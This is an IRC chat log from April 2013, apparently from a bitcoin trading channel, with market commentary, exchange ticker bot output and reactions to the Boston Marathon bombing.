taken a beating, too Apr 15 19:54:08 LONG overdue selloff in US equity markets.. Apr 15 19:55:07 wow -gold down to 1300's Apr 15 19:55:22 silver 23 Apr 15 19:55:30 lol, usagi silver etf Apr 15 19:55:42 !t h him Apr 15 19:55:44 [HAVELOCK:HIM] 1D: 1.42200000 / 1.74224 / 1.95000000 (50 shares, 87.11200000 BTC), 7D: 0.75000001 / 1.43097842 / 1.95000000 (329 shares, 470.79190011 BTC), 30D: 0.75000001 / 1.69665608 / 2.08000000 (822 shares, 1394.65130041 BTC) Apr 15 20:20:49 [MPEX] [S.MPOE] 7489 @ 0.0007054 = 5.2827 BTC [+] Apr 15 20:23:04 [HAVELOCK] [VTX] 1 @ 0.48 BTC [+] Apr 15 20:24:21 ;;nodes Apr 15 20:24:21 Error: "nodes" is not a valid command. Apr 15 20:24:29 gribble, go learn something new. Apr 15 20:26:58 ;;ticker Apr 15 20:26:59 BTCUSD ticker | Best bid: 93.97329, Best ask: 94.00000, Bid-ask spread: 0.02671, Last trade: 94.00000, 24 hour volume: 143971.50098586, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.53419 Apr 15 20:27:20 ;;bids 99 Apr 15 20:27:22 There are currently 0 bitcoins demanded at or over 99.0 USD, worth 0.0 USD in total. | Data vintage: 0.0042 seconds Apr 15 20:30:50 time to crash the market Apr 15 20:33:17 do it Apr 15 20:33:26 I want cheap coin! Apr 15 20:33:40 i did my best Apr 15 20:33:56 it is breaking support and the chart looks sickly Apr 15 20:34:12 agreed.. rolling over... Apr 15 20:34:14 just spread around this disinformative article http://www.nytimes.com/2013/04/15/opinion/krugman-the-antisocial-network.html Apr 15 20:34:32 someone else needs to take over from here Apr 15 20:34:39 I am totally out of coins. Apr 15 20:34:41 if we get below 85 then I expect lower from here Apr 15 20:35:19 once 92 drops it'll fall quickly to 80's Apr 15 20:35:19 massive dumping trades Apr 15 20:35:31 Bugpowder was that you? Apr 15 20:35:56 you had ~ 4000 BTC? Apr 15 20:36:16 no comment Apr 15 20:36:34 Lol, just let me know right before you rebuy Apr 15 20:36:40 I was part of it Apr 15 20:36:42 not all of it Apr 15 20:36:59 oh shit Apr 15 20:37:02 I'm jelly now Apr 15 20:37:04 ask wall at 92 now Apr 15 20:37:18 92 wall all gone Apr 15 20:37:19 If I had my whole porftolio value in BTC available to sell at 250 Apr 15 20:37:37 I'd have over 150k USD =/ Apr 15 20:37:58 no comment Apr 15 20:38:03 also $250 not enough Apr 15 20:38:14 yes, 250 is enough Apr 15 20:38:33 here we go! Apr 15 20:38:44 i may have bought some $180 coins during that fiasco Apr 15 20:38:58 and i may have sold them at $260 Apr 15 20:39:04 can't confirm Apr 15 20:39:07 <90 Apr 15 20:40:33 going going gone.. Apr 15 20:40:34 85.44 is 24h low Apr 15 20:40:40 ;;ticker Apr 15 20:40:41 BTCUSD ticker | Best bid: 89.01167, Best ask: 89.16000, Bid-ask spread: 0.14833, Last trade: 89.16000, 24 hour volume: 155047.46636155, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.29122 Apr 15 20:41:27 so weird, i always expect monday the price to go up based on our volume on canadianbitcoins Apr 15 20:47:44 wtf? Apr 15 20:48:26 Hi Simon__ Apr 15 20:48:41 hi Apr 15 20:48:54 lot's of spoofing going in this market, methinks... Apr 15 20:49:59 have you seen how the mpex bot is pricing put/call Apr 15 20:50:25 puts > 1BTC you mean? Apr 15 20:50:46 caveat emptor! Apr 15 20:51:10 calls > 1BTC Apr 15 20:51:14 even worse! Apr 15 20:51:17 95 c .44 95 put 2.36 Apr 15 20:51:34 not all calls, only some... ALL puts > 1 Apr 15 20:52:13 infinite vol Apr 15 20:53:01 bot doesn't want customers Apr 15 20:53:30 bond holders want too high of a return Apr 15 20:54:34 bot licking wounds... Apr 15 20:56:04 [HAVELOCK] [VTX] 2 @ 0.455 = 0.91 BTC [-] Apr 15 20:56:05 [HAVELOCK] [VTX] 2 @ 0.45 = 0.9 BTC [-] Apr 15 20:56:07 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Apr 15 20:59:00 [BTCTC] [ASICMINER-PT] 4 @ 0.8725 = 3.49 BTC [-] Apr 15 20:59:02 [BTCTC] [ASICMINER-PT] 6 @ 0.865 = 5.19 BTC [-] Apr 15 20:59:23 [MPEX] [S.MPOE] 5800 @ 0.00070521 = 4.0902 BTC [-] Apr 15 20:59:27 [BTCTC] [ASICMINER-PT] 1 @ 0.865 BTC [-] Apr 15 20:59:30 [BTCTC] [ASICMINER-PT] 1 @ 0.8602 BTC [-] Apr 15 20:59:32 [BTCTC] [ASICMINER-PT] 1 @ 0.8602 BTC [-] Apr 15 20:59:35 [BTCTC] [ASICMINER-PT] 5 @ 0.86 = 4.3 BTC [-] Apr 15 20:59:38 [BTCTC] [ASICMINER-PT] 2 @ 0.857 = 1.714 BTC [-] Apr 15 21:07:11 hi Apr 15 21:07:13 anyone here? Apr 15 21:08:21 no Apr 15 21:08:28 no Apr 15 21:08:47 oh, he quit already Apr 15 21:09:00 no time to even be a jerk Apr 15 21:12:21 [MPEX] [S.MPOE] 2150 @ 0.00070521 = 1.5162 BTC [-] Apr 15 21:12:23 [MPEX] [S.MPOE] 4047 @ 0.0006988 = 2.828 BTC [-] Apr 15 21:12:24 [BTCTC] [S.DICE-PT] 1 @ 0.00428 BTC [+] Apr 15 21:12:31 [BTCTC] [S.DICE-PT] 7 @ 0.00428 = 0.03 BTC [+] Apr 15 21:13:20 [BTCTC] [ASICMINER-PT] 10 @ 0.888 = 8.88 BTC [+] Apr 15 21:13:46 [BTCTC] [ASICMINER-PT] 1 @ 0.88998 BTC [+] Apr 15 21:16:39 ;;ticker Apr 15 21:16:40 BTCUSD ticker | Best bid: 90.12101, Best ask: 90.88899, Bid-ask spread: 0.76798, Last trade: 90.88900, 24 hour volume: 160856.43420830, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.03216 Apr 15 21:16:48 ;;next Apr 15 21:16:49 expecting to test 95.5, then to test 100 if 95.5 breaks| updated by OneFixt at Apr 15 2013, 17:49 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 27 minutes and 45 seconds ago Apr 15 21:25:04 [HAVELOCK] [VTX] 1 @ 0.46 BTC [+] Apr 15 21:25:36 ;;ticker Apr 15 21:25:38 BTCUSD ticker | Best bid: 91.19000, Best ask: 91.49999, Bid-ask spread: 0.30999, Last trade: 91.50000, 24 hour volume: 161115.30989828, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 94.02022 Apr 15 21:25:40 ;;seen smickles Apr 15 21:25:40 smickles was last seen in #bitcoin-assets 1 week, 4 days, 2 hours, 43 minutes, and 4 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 15 21:25:53 ;;next Apr 15 21:25:54 expecting to test 95.5, then to test 100 if 95.5 breaks| updated by OneFixt at Apr 15 2013, 17:49 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 36 minutes and 50 seconds ago Apr 15 21:29:03 [HAVELOCK] [SDICE] 3 @ 0.36600002 = 1.098 BTC [-] Apr 15 21:29:05 [HAVELOCK] [SDICE] 9 @ 0.36600001 = 3.294 BTC [-] Apr 15 21:29:06 [HAVELOCK] [SDICE] 1 @ 0.36600001 BTC [-] Apr 15 21:34:08 ;;ticker Apr 15 21:34:08 BTCUSD ticker | Best bid: 90.99998, Best ask: 91.49999, Bid-ask spread: 0.50001, Last trade: 91.50000, 24 hour volume: 161606.23154635, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 93.99775 Apr 15 21:36:56 -----BEGIN PGP PUBLIC KEY BLOCK----- Apr 15 21:36:56 Version: OpenPGP.js v.1.20130228 Apr 15 21:36:56 Comment: http://openpgpjs.org Apr 15 21:36:56 xo0EUWxD+gEEAOCBC/1kcm8O+r68a0TF/utKMa8DM7aLbjn8LTDYFOoWbFeN Apr 15 21:36:56 fawlsI9g0GY9XFbnbtDspu/SeQIJ4LSU0i2PmW7Wk6NAG9NK8LLD1xyQyhvv Apr 15 21:36:56 zr7vMEzh/RTQ+gRE70rwG5dDtfv90ns3TLD+bUS7dv7DRNkxqrDaSPIlUt8t Apr 15 21:36:57 ZLGZABEBAAHNH1R5bGVyIEFiZW5zIDxUQ0FiZW5zQGdtYWlsLmNvbT7CnAQQ Apr 15 21:36:57 AQIAEAUCUWxD+gkQeozgH8i9jjcAAKKFBACQWYk1NDmDwEcGuAlF3n1SzwI/ Apr 15 21:36:58 NRFwdc2Q0NMsPbg8e6AyM9DnfgURYVN/ljFYy3plMBy+CJ31h22A8i/pktbz Apr 15 21:36:58 X1yWiaYHNpXsPliPef9nDI5kBo7tsURktDrEy1xe52DaMH7ClNDgW1OnqFVX Apr 15 21:37:41 doing it wrong Apr 15 21:37:42 wrong window, sorry Apr 15 21:39:03 [HAVELOCK] [SDICE] 2 @ 0.366 = 0.732 BTC [-] Apr 15 21:41:04 [HAVELOCK] [SDICE] 10 @ 0.36600003 = 3.66 BTC [+] Apr 15 21:58:09 BTCUSD ticker | Best bid: 92.50003, Best ask: 93.00000, Bid-ask spread: 0.49997, Last trade: 93.00000, 24 hour volume: 163163.82299830, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 93.94272 Apr 15 21:58:38 [BTCTC] [ASICMINER-PT] 1 @ 0.8899 BTC [-] Apr 15 21:58:42 http://www.vrijspreker.nl/wp/wp-content/media/2013/04/zilver_slave_queen_base_zgw-505x505.jpg Apr 15 21:58:49 [BTCTC] [ASICMINER-PT] 1 @ 0.88999 BTC [+] Apr 15 21:59:43 MtGox lag is 0.550961 seconds. During this time, light travels 0.00110411967513 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 15 22:00:05 [MPEX] [S.MPOE] 2111 @ 0.0007054 = 1.4891 BTC [+] Apr 15 22:00:07 [MPEX] [S.MPOE] 9498 @ 0.00071 = 6.7436 BTC [+] Apr 15 22:00:35 [BTCTC] [ASICMINER-PT] 11 @ 0.89 = 9.79 BTC [+] Apr 15 22:17:56 ;;asks 99 Apr 15 22:17:58 There are currently 9498.067 bitcoins offered at or under 99.0 USD, worth 920456.340518 USD in total. | Data vintage: 0.0033 seconds Apr 15 22:18:09 ;;bids 90 Apr 15 22:18:09 There are currently 1588.4914 bitcoins demanded at or over 90.0 USD, worth 143371.686688 USD in total. | Data vintage: 11.5109 seconds Apr 15 22:18:15 ;;bids 80 Apr 15 22:18:16 There are currently 28364.908 bitcoins demanded at or over 80.0 USD, worth 2402240.82237 USD in total. | Data vintage: 17.5698 seconds Apr 15 22:21:06 [MPEX] [S.MPOE] 3052 @ 0.0006988 = 2.1327 BTC [-] Apr 15 22:22:21 haha https://bitcointalk.org/index.php?topic=171723.msg1786279#msg1786279 Apr 15 22:25:27 ;;bids 0 Apr 15 22:25:29 There are currently 43699603 bitcoins demanded at or over 0.0 USD, worth 14291166.8035 USD in total. | Data vintage: 0.0084 seconds Apr 15 22:29:57 [BTCTC] [ASICMINER-PT] 3 @ 0.89 = 2.67 BTC [+] Apr 15 22:37:06 [BTCTC] [ASICMINER-PT] 1 @ 0.88999 BTC [-] Apr 15 22:37:42 http://turtle.dereferenced.org/~nenolod/linode/linode-abridged.txt Apr 15 22:37:49 interesting read Apr 15 22:41:00 SP500 -33.5 Apr 15 22:41:05 big move Apr 15 22:41:15 boston bomb scare now too Apr 15 22:41:25 how do bomb scares effect markets? Apr 15 22:41:56 wow VIX up 40% today Apr 15 22:42:22 !last h vix Apr 15 22:42:22 Shit. You ain't even old enough to smoke. Apr 15 22:42:43 !last h vtx Apr 15 22:42:43 Last trade for VTX on HAVELOCK was at 0.46 BTC [+] Apr 15 22:42:48 16.60 last.. 12.01 friday close Apr 15 22:43:15 S&P volatily index... Apr 15 22:45:31 damn... I think my sister is running boston. Apr 15 22:45:37 maybe that is next year Apr 15 22:45:41 I better check. Apr 15 22:47:11 7 blocks in 10 minutes?!? Apr 15 22:47:42 wow yep Apr 15 22:51:14 [BTCTC] [ASICMINER-PT] 5 @ 0.89 = 4.45 BTC [+] Apr 15 22:51:54 sup everybody Apr 15 22:52:01 alt chains Apr 15 22:52:02 apparently Apr 15 22:52:10 gold, silver and bitcoins are down Apr 15 22:52:17 what is the world coming to? Apr 15 22:52:25 alt coins are up Apr 15 22:52:31 lol Apr 15 22:52:45 ltc broke $4? Apr 15 22:53:04 i havent been paying close attention just got the word, no numbers included Apr 15 22:53:22 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Apr 15 22:54:06 [MPEX] [S.MPOE] 6800 @ 0.00069917 = 4.7544 BTC [+] Apr 15 22:54:17 nah just .0028 Apr 15 22:54:46 .028 Apr 15 22:55:01 EVERYTHING IS TANKING Apr 15 22:56:25 [BTCTC] [GOLD] 4 @ 0.138 = 0.552 BTC [+] Apr 15 22:56:58 http://c.washingtontimes.com/neighborhood/business-living/2013/apr/14/google-car-3d-printing-and-bitcoin-great-innovatio/ Apr 15 22:57:05 great article Apr 15 22:57:05 [BTCTC] [GOLD] 1 @ 0.138 BTC [+] Apr 15 22:58:04 http://bitcoinmagazine.com/bitcoin-is-not-antisocial-a-rebuttal-to-paul-krugman/ Apr 15 22:58:11 and this one was like poetry to my ears Apr 15 23:01:17 88 Apr 15 23:01:30 [BTCTC] [PAJKA.BOND] 1 @ 0.10179 BTC [+] Apr 15 23:01:47 whats new Bugpowder, you got any altcoins going? Apr 15 23:01:57 no I am totaly out of bitcoins Apr 15 23:02:03 except for some physical Apr 15 23:02:17 sold the last 25% this morning at 94 Apr 15 23:02:30 triggered a big fish to dump 8k Apr 15 23:02:49 ah Apr 15 23:02:52 you have puts? Apr 15 23:02:57 no Apr 15 23:03:02 tanking on a monday... I guess it really is fulfilling the prophecy Apr 15 23:03:03 too expensive Apr 15 23:03:05 but also i was asking about altcoins Apr 15 23:03:06 yes Apr 15 23:03:11 I have no altcoins Apr 15 23:03:15 oh Apr 15 23:03:20 so you are completely back to fiat? Apr 15 23:03:34 except for 40 physical BTC Apr 15 23:03:41 well that is still pretty nice Apr 15 23:03:47 he is preparing for the next hype cycle :p Apr 15 23:03:53 hehehe Apr 15 23:03:57 i don't know Apr 15 23:04:04 i think things are going to get more stable Apr 15 23:04:10 and we will see a lot better sites out there Apr 15 23:04:21 slow steady growth back to 200 Apr 15 23:04:32 thats what i expect for the rest of 2013 Apr 15 23:04:40 wrong Apr 15 23:04:45 I think we fade from here Apr 15 23:04:48 retest lows Apr 15 23:05:01 i am a buyer for a quick flip at 52 Apr 15 23:05:16 and for long term at 32, 26, 21, 16, 13, 11 Apr 15 23:05:47 there will be significant bounces on the way down, but down we must go Apr 15 23:05:57 My coins were from $2.65 on the last bottom Apr 15 23:06:10 If you want the 100x return, you need to be near the bottom Apr 15 23:06:34 that BFL link is pretty good Apr 15 23:06:36 lol Apr 15 23:07:52 stability is very much needed Apr 15 23:08:17 im not a big merchant or anything but when the price is stable I get 10 times more payments Apr 15 23:09:12 when you start seeing the post-mortem articles on the rise fall rise and final death of bitcoin, THAT'S when you buy. Apr 15 23:09:43 I bought my coins the day this article came out. http://www.wired.com/magazine/2011/11/mf_bitcoin/ Apr 15 23:09:56 Jumping in late here, what happened that makes you guys think you'll see $11 again? Apr 15 23:09:58 plus or minus a few days, I don't really remember Apr 15 23:10:08 TomServo: The bubble popped? Apr 15 23:10:14 I don't think we will see 11 Apr 15 23:10:22 I think 16-32 is the likely bottom Apr 15 23:10:30 but if we see 11, I'll buy 10,000BTC. Apr 15 23:10:43 Well.... maybe 5000 Apr 15 23:12:02 lol Apr 15 23:12:17 Man, I forget that the fall from 32 to 5ish took several months. Apr 15 23:12:22 Cripes just saw the news... if anyone's in Boston hope you and yours are okay. Apr 15 23:13:19 I think 32ish, the old high, lots of resistence getting through it - i think it'll represent significant support. Apr 15 23:13:40 TomServo: http://i.imgur.com/fZwy3xd.png Apr 15 23:14:11 32 feels like the right valuation Apr 15 23:14:24 15 felt right, before the bubble Apr 15 23:14:35 there will be plenty of infrastructure growth till then Apr 15 23:14:42 err, since then Apr 15 23:14:57 so 32. But often there is undershoot when a bubble pops Apr 15 23:15:07 so I'm hoping to pick some up cheaper Apr 15 23:15:34 87.5 Apr 15 23:15:55 ;;ticker Apr 15 23:15:56 BTCUSD ticker | Best bid: 87.51100, Best ask: 87.51101, Bid-ask spread: 0.00001, Last trade: 87.50000, 24 hour volume: 163207.51950014, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 93.43970 Apr 15 23:16:31 we'll see - i also think that bottom formation has a lot to do with velocity Apr 15 23:16:52 we need total capitulation Apr 15 23:17:06 Then I will pounce. Apr 15 23:17:10 mee too Apr 15 23:17:36 but it'll be hard to do when gox breaks again - lol Apr 15 23:18:13 man, if today was the top on the SP500 too, tiberiusiv's gloating is going to be so fucking annoying. Apr 15 23:18:24 ;;next Apr 15 23:18:24 expecting to test 93, then to test 98 if 93 breaks, then testing 100 and targetting 103-105 | updated by OneFixt at Apr 15 2013, 18:43 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 1 hour, 35 minutes, and 20 seconds ago Apr 15 23:18:32 [MPEX] [S.MPOE] 1950 @ 0.00069917 = 1.3634 BTC [+] Apr 15 23:18:43 Bugpowder_: S&P is down Apr 15 23:18:48 so is DOW Apr 15 23:18:51 what's his deal anyway? very aggressive on chat... Apr 15 23:18:53 thestringpuller: yes I know Apr 15 23:19:05 I bought some international stock funds today Apr 15 23:19:08 ;;ticker Apr 15 23:19:09 BTCUSD ticker | Best bid: 87.52001, Best ask: 87.99999, Bid-ask spread: 0.47998, Last trade: 88.00000, 24 hour volume: 163150.78113255, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 93.41196 Apr 15 23:19:09 at the close Apr 15 23:19:20 ;;bids 80 Apr 15 23:19:22 There are currently 20414.097 bitcoins demanded at or over 80.0 USD, worth 1703773.20849 USD in total. | Data vintage: 0.0046 seconds Apr 15 23:19:30 ;;asks 100 Apr 15 23:19:30 There are currently 20556.668 bitcoins offered at or under 100.0 USD, worth 1988149.39395 USD in total. | Data vintage: 8.0104 seconds Apr 15 23:19:52 ;;bc,24hprc Apr 15 23:19:53 93.36 Apr 15 23:20:21 at what price does mining difficulty start to go down? Apr 15 23:20:45 ? Apr 15 23:20:53 20? Apr 15 23:20:54 where miners start unplugging Apr 15 23:21:01 15? Apr 15 23:21:18 less? Apr 15 23:21:44 if you look at '11 Apr 15 23:21:45 i suppose it all about marginal electricity at that point, unless you're renting your mining hardware... Apr 15 23:21:45 it took some time Apr 15 23:21:56 and now with asics it's going to be even less pronounced Apr 15 23:22:04 because noone will be unplugging them Apr 15 23:22:32 i guess if avalon was thinking about not selling to the public anymore, this seals that deal Apr 15 23:24:26 chart not looking so good... I think it starts to accellerate here... Apr 15 23:25:39 86 Apr 15 23:26:59 and i predict this is where mtgox starts lagging out for the rest of the day Apr 15 23:28:27 I predict no notable lag Apr 15 23:28:39 is it safe to keep fiat at bitfloor? Apr 15 23:28:57 if you have to ask! Apr 15 23:29:02 lol at the sells Apr 15 23:29:46 i know they got hacked for fiat in sept... but it's not like you can just magically get cash into an exchange when you need it. Apr 15 23:29:52 deadweasal: i think so Apr 15 23:30:13 is there a better way to handle the fiat@exchange problem? Apr 15 23:30:16 they we hacked for BTC Apr 15 23:30:32 so fiat was untouched, because it's digital and traceable? Apr 15 23:31:07 really hard to steal fiat - period... Apr 15 23:31:10 deadweasel: well, banks will insure you for unauthorized transactions Apr 15 23:31:25 fraudulant transactions can be reversed Apr 15 23:31:34 ;;ticker Apr 15 23:31:34 BTCUSD ticker | Best bid: 85.50001, Best ask: 85.70000, Bid-ask spread: 0.19999, Last trade: 85.70000, 24 hour volume: 165090.90853723, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 93.14763 Apr 15 23:31:41 yeah, alright. I won't be wiped out if someone takes my cash, but i'd prefer not. thx for the input. Apr 15 23:31:50 btw, anybody know what exactly exploded at the boston marathon today? Apr 15 23:32:01 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [+] Apr 15 23:32:10 c'mon 85! Apr 15 23:38:15 not much known yeat deadweasel, two bombs in buildings by finish line, more possible lame bombs found Apr 15 23:38:19 up to 50 inured Apr 15 23:38:24 at least 3 dead Apr 15 23:38:26 2 Apr 15 23:38:40 https://pbs.twimg.com/media/BH6fwFvCUAA-PWb.jpg Apr 15 23:38:58 http://live.reuters.com/Event/Boston_Marathon_Explosion <--- horrible number of scripts on this page Apr 15 23:39:22 [MPEX] [S.MPOE] 986 @ 0.00071 = 0.7001 BTC [+] Apr 15 23:39:24 [MPEX] [S.MPOE] 3564 @ 0.00071073 = 2.533 BTC [+] Apr 15 23:47:03 [MPEX] [S.DICE] 1 @ 0.004 BTC [+] Apr 15 23:52:21 ;;bids 0 Apr 15 23:52:23 There are currently 43609509 bitcoins demanded at or over 0.0 USD, worth 13193804.0522 USD in total. | Data vintage: 0.0088 seconds Apr 15 23:52:26 ;;asks 9999999999999 Apr 15 23:52:27 There are currently 160834.57 bitcoins offered at or under 1e+13 USD, worth 1.41067200249e+13 USD in total. | Data vintage: 3.4524 seconds Apr 15 23:52:46 lololol Apr 15 23:52:50 its over Apr 15 23:53:00 ;;ticker Apr 15 23:53:01 BTCUSD ticker | Best bid: 86.46109, Best ask: 86.68000, Bid-ask spread: 0.21891, Last trade: 86.68000, 24 hour volume: 167132.72055536, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 92.82566 Apr 15 23:53:04 [HAVELOCK] [KCIM] 2 @ 1.22 = 2.44 BTC [+] Apr 15 23:53:08 whats over? Apr 15 23:53:11 [MPEX] [S.DICE] 1000 @ 0.00409989 = 4.0999 BTC [+] Apr 15 23:53:13 the bubble? Apr 15 23:53:26 [MPEX] [S.DICE] 1500 @ 0.00409991 = 6.1499 BTC [+] Apr 15 23:53:39 ;;asks 95 Apr 15 23:53:39 There are currently 11596.617 bitcoins offered at or under 95.0 USD, worth 1061084.76118 USD in total. | Data vintage: 75.6159 seconds Apr 15 23:53:58 http://www.youtube.com/watch?v=dsx2vdn7gpY Apr 15 23:54:06 [MPEX] [S.DICE] 1000 @ 0.00409995 = 4.1 BTC [+] Apr 15 23:54:13 i dony have youtube Apr 15 23:54:17 S.DICE could be a good buy now Apr 15 23:54:28 clearly the bounce is being front run a bit Apr 15 23:54:42 ;;ticker Apr 15 23:54:43 BTCUSD ticker | Best bid: 86.24000, Best ask: 86.34999, Bid-ask spread: 0.10999, Last trade: 86.35000, 24 hour volume: 167118.49060236, 24 hour low: 84.43689, 24 hour high: 102.00000, 24 hour vwap: 92.82210 Apr 15 23:54:55 im down for a fire and a couple of songs Apr 15 23:55:01 lol Apr 15 23:55:18 more buyers are on the way though Apr 15 23:55:26 yeah Apr 15 23:55:32 just like this morning Apr 15 23:55:47 dunno about that Apr 15 23:55:47 when the bounce didn't happen Apr 15 23:56:04 [HAVELOCK] [SDICE] 1 @ 0.37 BTC [+] Apr 15 23:56:22 also apropriate to listen while charts http://www.youtube.com/watch?v=NoBFhdeR9PE Apr 15 23:56:58 [BTCTC] [GSDPT] 1544 @ 0.003734 = 5.7653 BTC [+] Apr 15 23:57:06 [BTCTC] [GSDPT] 54 @ 0.00392 = 0.2117 BTC [+] Apr 15 23:57:14 [BTCTC] [GSDPT] 1007 @ 0.004 = 4.028 BTC [+] Apr 15 23:57:23 [BTCTC] [GSDPT] 106 @ 0.004 = 0.424 BTC [+] Apr 15 23:57:52 dude btc is hella surviving... Apr 15 23:58:05 [HAVELOCK] [SDICE] 2 @ 0.37 = 0.74 BTC [+] Apr 15 23:58:24 83 Apr 15 23:58:27 85 gone Apr 15 23:58:36 [MPEX] [S.MPOE] 8750 @ 0.00071199 = 6.2299 BTC [+] Apr 15 23:58:45 24h low Apr 15 23:59:17 48 hour low Apr 15 23:59:19 ;;next Apr 15 23:59:20 expecting to test 93, then to test 98 if 93 breaks, then testing 100 and targetting 103-105 | updated by OneFixt at Apr 15 2013, 18:43 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 2 hours, 16 minutes, and 16 seconds ago Apr 15 23:59:25 lag-a-licious Apr 15 23:59:32 dude that guy is an idiot Apr 15 23:59:36 ;;goxlag Apr 15 23:59:37 MtGox lag is 0.18639 seconds. During this time, light travels 0.000373523473074 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 15 23:59:45 85 went down Apr 15 23:59:46 ;;bids 80 Apr 15 23:59:46 There are currently 12461.383 bitcoins demanded at or over 80.0 USD, worth 1025539.32766 USD in total. | Data vintage: 16.3550 seconds Apr 15 23:59:51 we are going DOWN Apr 15 23:59:58 keep on sellin the. Apr 16 00:00:05 whoa Apr 16 00:00:07 81 Apr 16 00:00:09 is coming Apr 16 00:00:13 ;;ticker Apr 16 00:00:13 BTCUSD ticker | Best bid: 82.23450, Best ask: 83.00000, Bid-ask spread: 0.76550, Last trade: 82.23450, 24 hour volume: 172174.43696469, 24 hour low: 83.12000, 24 hour high: 102.00000, 24 hour vwap: 92.56464 Apr 16 00:00:22 itss hit 90 overnight Apr 16 00:00:25 just you see Apr 16 00:01:11 There will be bounces Apr 16 00:01:23 short lived pathetic little things Apr 16 00:01:30 so unlike the bounces of yesteryear Apr 16 00:01:50 we'll see - off to get a drink - will have to monitor situation from cell phone (blows) Apr 16 00:02:35 btw, anyone got a nexus 4? Apr 16 00:02:47 mine just doesn't like the mtgox app Apr 16 00:03:03 crashes on startup Apr 16 00:03:07 huh Apr 16 00:03:13 mtgox qualitat Apr 16 00:04:25 even the bounces are almost gone Apr 16 00:04:59 thats becuase the selloff's haven't gotten violent enough. yet. Apr 16 00:05:16 If we drop to 50 there will be a bounce Apr 16 00:06:50 every bounce with a lower high Apr 16 00:07:20 every dip a lower low Apr 16 00:10:05 [HAVELOCK] [SDICE] 2 @ 0.37 = 0.74 BTC [+] Apr 16 00:10:50 http://bcove.me/qwi5k6ap Apr 16 00:10:50 video of the bombing Apr 16 00:11:23 ;;bids 0 Apr 16 00:11:25 There are currently 49607416 bitcoins demanded at or over 0.0 USD, worth 12514542.8959 USD in total. | Data vintage: 0.0087 seconds Apr 16 00:11:28 ;;asks 99999999999 Apr 16 00:11:28 There are currently 161806.29 bitcoins offered at or under 99999999999.0 USD, worth 125033136860.0 USD in total. | Data vintage: 2.8288 seconds Apr 16 00:13:19 this is more like it Apr 16 00:13:22 :D Apr 16 00:15:27 ;;ticker Apr 16 00:15:28 BTCUSD ticker | Best bid: 82.20000, Best ask: 82.39999, Bid-ask spread: 0.19999, Last trade: 82.40000, 24 hour volume: 181286.53123402, 24 hour low: 81.11000, 24 hour high: 102.00000, 24 hour vwap: 91.99549 Apr 16 00:16:17 ;;ticker Apr 16 00:16:18 mtgox humming along nicely Apr 16 00:16:18 BTCUSD ticker | Best bid: 82.00000, Best ask: 82.23300, Bid-ask spread: 0.23300, Last trade: 85.07394, 24 hour volume: 181765.32662977, 24 hour low: 81.11000, 24 hour high: 102.00000, 24 hour vwap: 91.96967 Apr 16 00:16:38 why no lag suddenly?!?! maybe they finally released the brakes... Apr 16 00:17:44 ;;ticker Apr 16 00:17:44 BTCUSD ticker | Best bid: 82.46070, Best ask: 82.50000, Bid-ask spread: 0.03930, Last trade: 82.50000, 24 hour volume: 182869.62756165, 24 hour low: 81.11000, 24 hour high: 102.00000, 24 hour vwap: 91.91353 Apr 16 00:19:48 sdice rallying pretty hard Apr 16 00:20:04 no surprise there Apr 16 00:20:22 but that will only be supported if betting volume actually picks up Apr 16 00:20:30 and buy back in lower Apr 16 00:20:31 I would rather cash out of coins Apr 16 00:20:50 and then move to s.dice when bet volume is shown to be up again Apr 16 00:20:56 i guess it depends where it lands Apr 16 00:21:04 people are front-running S.DICE Apr 16 00:21:08 and it's low volume Apr 16 00:21:17 its not a bad idea Apr 16 00:21:28 but not a home run either Apr 16 00:21:39 Bugpowdurr: you done with btc? Apr 16 00:22:01 hell no Apr 16 00:22:10 no Apr 16 00:22:10 I just want more Apr 16 00:22:40 lol Apr 16 00:23:23 bid ask gox 88 81 Apr 16 00:23:31 nm Apr 16 00:23:53 I will buy the winkelvoxen's stack when they capitulate Apr 16 00:24:28 [MPEX] [S.MPOE] 9600 @ 0.00071101 = 6.8257 BTC [-] Apr 16 00:24:58 btw - got some c302t's on the market, CHEEP! Apr 16 00:26:05 hehe Apr 16 00:26:20 ;;next Apr 16 00:26:21 expecting to test 93, then to test 98 if 93 breaks, then testing 100 and targetting 103-105 | updated by OneFixt at Apr 15 2013, 18:43 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 2 hours, 43 minutes, and 17 seconds ago Apr 16 00:26:28 ;;ticker Apr 16 00:26:28 BTCUSD ticker | Best bid: 82.00001, Best ask: 82.21000, Bid-ask spread: 0.20999, Last trade: 82.00001, 24 hour volume: 184460.54915531, 24 hour low: 81.11000, 24 hour high: 102.00000, 24 hour vwap: 91.82169 Apr 16 00:26:53 I have some O.USD.P089T Apr 16 00:27:05 ;;bids 80 Apr 16 00:27:07 There are currently 6374.6862 bitcoins demanded at or over 80.0 USD, worth 513716.693315 USD in total. | Data vintage: 0.0041 seconds Apr 16 00:27:14 ;;asks 90 Apr 16 00:27:15 There are currently 